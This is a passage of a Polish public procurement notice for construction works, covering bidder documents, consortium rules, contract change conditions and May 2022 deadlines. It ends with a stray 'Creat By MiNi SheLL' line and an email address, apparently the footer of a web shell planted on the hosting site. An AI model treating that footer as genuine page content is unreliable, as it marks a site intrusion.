roboty<br/>budowlane zostały wykonane należycie, przy czym dowodami, októrych mowa, są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów –inne<br/>odpowiednie dokumenty<br/>Uwaga: Jeżeli wykonawca powołuje sią na doświadczenie w realizacji robót budowlanych, wykonanych<br/>wspólnie z innymi wykonawcami, powyższy wykaz może dotyczyć tylko robót budowlanych faktycznie<br/>przez niego wykonanych.<br/>2) wykaz osób, zgodny ze wzorem zamieszczonym w załączniku nr 5 do SWZ, skierowanych przez<br/>wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie<br/>robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, i<br/>doświadczenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji Wykonawcy<br/>niezbędnych zasobów na potrzeby wykonania zamówienia lub inny podmiotowy środek<br/>dowodowy potwierdzający, że wykonawca realizując zamówienie będzie dysponowałniezbędnymi zasobami podmiotów udostępniających zasoby (jeżeli dotyczy).2. Pełnomocnictwo<br/>lub inne dokumenty z których wynika prawo do podpisania oferty oraz do<br/>podpisania innych dokumentów składanych wraz z ofertą, chyba że Zamawiający może je<br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych w szczególności rejestrów<br/>publicznych w rozumieniu ustawy z dnia 17 lutego 2005r. o informatyzacji działalności<br/>podmiotów realizujących zadania publiczne (Dz.U. z 2019r. poz.700 z późn.zm.).3.<br/>Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, ewentualnie umowa o współdziałaniu z której będzie wynikać<br/>przedmiotowe pełnomocnictwo (jeżeli dotyczy).4. W przypadku składania oferty przez<br/>konsorcjum – oświadczenie, o którym mowa w art.117<br/>ust.4 (wg. wzoru stanowiącego załącznik nr 7 do SWZ).5. Jeżeli wykonawca ma siedzibę lub<br/>miejsce zamieszkania poza granicami Rzeczypospolitej<br/>Polskiej, zamiast:1) zaświadczenia, o którym mowa w sekcji 5.6) pkt 1 ogłoszenia,<br/>zaświadczenia albo innego dokumentu potwierdzającego, że wykonawca nie zalega z<br/>opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, o których mowa w sekcji 5.6)<br/>pkt 2 ogłoszenia lub odpisu albo<br/>informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności<br/>Gospodarczej, o których mowa w sekcji 5.6) pkt 3 ogłoszenia – składa dokument lub dokumenty<br/>wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające odpowiednio, że:a) nie naruszył obowiązków dotyczących płatności podatków,<br/>opłat lub składek na ubezpieczenie społeczne lub zdrowotne,<br/>b) nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub<br/>sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani<br/>nie znajduje się on winnej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej<br/>w przepisach miejsca wszczęcia tej procedury - wystawione nie wcześniej niż 3 miesiące przed<br/>ich złożeniem 6. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie<br/>wydaje się dokumentów, o których mowa pkt 5, lub gdy dokumenty te nie odnoszą się do<br/>wszystkich przypadków, o których mowa w art. 109 ust.1 pkt 1 Pzp, zastępuje się je odpowiednio<br/>w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze<br/>wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby,<br/>której dokumentmiał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca<br/>ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone<br/>przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego<br/>lub gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy<br/>(wystawione nie wcześniej niż 3 miesiące przed ich złożeniem). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> udzielenie zamówienia:<br/>1. W przypadku składania oferty przez podmioty występujące wspólnie w formularzu oferty<br/>należy podać nazwy (firmy) oraz dokładne adresy wszystkich wykonawców składających<br/>ofertę,a oferta powinna być podpisana przez ustanowionego pełnomocnika. Do oferty dołączyć<br/>należy<br/>pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się oudzielenie zamówienia, ewentualnie umowę o współdziałaniu z której będzie<br/>wynikaćprzedmiotowe pełnomocnictwo.<br/>2.Zasady spełniania warunków przez wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia podano w sekcji 5.4 ogłoszenia. 3. W odniesieniu do warunków dotyczących<br/>wykształcenia, kwalifikacji zawodowych lub<br/>doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji<br/>których te zdolności są wymagane. 4.Żaden z wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać wykluczeniu z udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiany w Umowie można wprowadzić za zgodą obu stron na piśmie, w formie<br/>aneksu.<br/>2. Zamawiający dopuszcza możliwość zmiany Umowy w następującym zakresie<br/>i na warunkach:<br/>2.1 Wykonanie robót zamiennych w sytuacji gdy proponowane rozwiązanie jest równorzędne lub<br/>lepsze funkcjonalnie, jakościowo i technicznie.<br/>2.2 Zwiększenie zakresu rzeczowego przedmiotu zamówienia o:<br/>1) roboty w ilości większej niż to wynika z przedmiaru,<br/>2) wykonanie robót nieujętych w dokumentacji na skutek błędu oraz robót dodatkowych, których<br/>wykonanie jest potrzebne do wykonania przedmiotu zamówienia i których z przyczyn<br/>technicznych, gospodarczych lub ekonomicznych nie należy oddzielić od zamówienia<br/>podstawowego.<br/>2.3 Zmiany w zakresie przedmiotu zamówienia w przypadkach:<br/>1) gdy wykonanie całego zakresu nie będzie możliwe z przyczyn prawnych, finansowych,<br/>organizacyjnych lub społecznych,<br/>2) stwierdzenia przez Zamawiającego konieczności rezygnacji z wykonania części przedmiotu<br/>zamówienia (roboty zaniechane lub zmniejszenie ilości robót).<br/>2.4 Zmiana wysokości wynagrodzenia w przypadku:<br/>1) ustawowej zmiany stawki podatku od towarów i usług (VAT) odpowiednio poprzez<br/>podwyższenie lub obniżenie wynagrodzenia brutto z tym, że wynagrodzenie netto pozostanie<br/>niezmienione,<br/>2) konieczności wykonania robót w sytuacjach określonych w ust. 2.1 i 2.2 - wynagrodzenie za<br/>wykonanie roboty ustalane będzie zgodnie z § 12 ust. 5 pkt 1), 2) i 3),<br/>3) zmniejszenia zakresu przedmiotu zamówienia w sytuacjach określonych<br/>w ust. 2.3 - wynagrodzenie za wykonanie roboty ustalane będzie zgodnie z §12 ust. 5 pkt 4) i 5).<br/>2.5 Zmiana terminu realizacji przedmiotu zamówienia, gdy jest ona spowodowana:<br/>1) warunkami atmosferycznymi, które to uniemożliwiają lub utrudniają w wysokim stopniu<br/>wykonanie robót zgodnie z technologią i przepisami BHP – utrzymującymi się przez okres co<br/>najmniej 3 dni,<br/>2) ujawnieniem niewybuchów i niewypałów wymagających wstrzymania robót<br/>i dokonania ich usunięcia przez specjalistyczne służby,3) niemożnością prowadzenia prac ze względu na okresową ochronę miejsc gniazdowania<br/>ptaków oraz miejsc stanowiących ich ostoję lub miejsce żerowania oraz w innych przypadkach<br/>wstrzymania prac związanych<br/>z ochroną gatunkową zwierząt,<br/>4) wystąpienia konieczności wykonania robót zamiennych lub robót dodatkowych, które<br/>wstrzymują lub opóźniają realizację przedmiotu zamówienia,<br/>5) zwiększeniem zakresu rzeczowego, o ile nie będzie ich można wykonywać równolegle z<br/>zamówieniem,<br/>6) wadami dokumentacji projektowej, gdy konieczność ich usunięcia wymaga wprowadzenia<br/>zmian przez projektantów, uzyskania uzgodnień, opinii, decyzji administracyjnych, itp.,<br/>7) działania siły wyższej w rozumieniu Kodeksu Cywilnego (Dz.U. z 2020 r., poz. 1740 z późn.<br/>zm.), uniemożliwiającej wykonanie Umowy w określonym terminie – o czas działania siły<br/>wyższej oraz o czas potrzebny do usunięcia skutków tego działania,<br/>8) niemożliwością wykonywania prac ze względu na protesty społeczne związane z<br/>wykonywaniem robót budowlanych – o czas zablokowania prac oraz czas potrzebny do<br/>usunięcia skutków tego działania, <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-26 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu na skrytkę ePUAP Zamawiającego: /umswidnik/SkrytkaESP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-26 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-24</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> cd. przewidzianych zmian w umowie - pkt. 7.4 ogłoszenia<br/>9) niemożliwością wykonywania prac ze względu na ograniczenia, zakazy<br/>i nakazy spowodowane epidemią koronawirusa, w przypadkach i na zasadach określonych w<br/>przepisach,<br/>10) wystąpienia warunków terenu budowy odbiegających w sposób istotny od przyjętych w<br/>Dokumentacji projektowej, w szczególności napotkania niezinwentaryzowanych lub błędnie<br/>zinwentaryzowanych sieci, instalacji lub innych obiektów budowlanych,<br/>11) wstrzymaniem prac budowlanych przez właściwy organ z przyczyn niezależnych od<br/>Wykonawcy,<br/>12) wydłużeniem minimalnych terminów uzyskania niezbędnych uzgodnień<br/>i decyzji przez Wykonawcę i Zamawiającego, pomimo dopełnienia przez Wykonawcę i<br/>Zamawiającego należytej staranności,<br/>13) prowadzonymi równolegle robotami budowlano-montażowymi przez inne podmioty, które<br/>uniemożliwiają realizację zamówienia – o okres, w którym nie była możliwa realizacja<br/>zamówienia z tego powodu potwierdzony wpisem Inspektora do dziennika budowy,14) następstwem wprowadzenia zmian w przepisach prawa.<br/>Fakty te muszą być odnotowane w dzienniku budowy i potwierdzone przez Inspektora, lub<br/>informacja o nich przekazana Zamawiającemu na piśmie.<br/>W przypadku wystąpienia opóźnień spowodowanych wyżej wymienionymi okolicznościami,<br/>Strony ustalą nowe terminy z tym, że maksymalny okres przesunięcia terminu zakończenia<br/>realizacji przedmiotu zamówienia równy będzie okresowi uzasadnionej przerwy lub przestoju.<br/>3. Zamawiający jest uprawniony do żądania zmiany sposobu rozliczania Umowy lub<br/>dokonywania płatności na rzecz Wykonawcy w związku ze zmianami zawartej przez<br/>Zamawiającego umowy o dofinansowanie projektu lub zmianami wytycznych dotyczących<br/>realizacji projektu.<br/>4. Warunkiem dokonania zmian, o których mowa w ust. 2.5 pkt 1) - 14) jest złożenie wniosku<br/>przez Stronę inicjującą zmianę i uzyskanie zgody drugiej Strony Umowy.<br/>5. W terminie 14 dni od dnia otrzymania wniosku dotyczącego robót, o których mowa w ust. 2.1,<br/>2.2, 2.3 wraz z propozycją wyceny robót i informacji uzasadniających żądanie zmiany Umowy,<br/>Zamawiający zobowiązany jest do pisemnego ustosunkowania się do zgłoszonego żądania<br/>zmiany Umowy<br/>i odpowiednio propozycji wyceny robót, zarówno w przypadku odmowy jak<br/>i akceptacji żądania zmiany.<br/>6. Bez zgody Zamawiającego mogą być wykonywane jedynie prace mające na celu niezwłoczne<br/>zapobieżenie awarii, szkodzie lub utracie życia i zdrowia, o czym Wykonawca zobowiązany jest<br/>natychmiast zawiadomić Zamawiającego.<br/>7. Powyższe zmiany można wprowadzić za zgodą obu stron, w formie aneksu.<br/>8. Nieważność któregokolwiek z postanowień Umowy nie narusza ważności pozostałych jej<br/>postanowień, a Strony zobowiązują się w takim przypadku niezwłocznie zastąpić nieważne<br/>postanowienie innym, prawnie wiążącym, które możliwie najwierniej oddaje zamierzony cel<br/>nieważnego postanowienia.

Creat By MiNi SheLL
Email: jattceo@gmail.com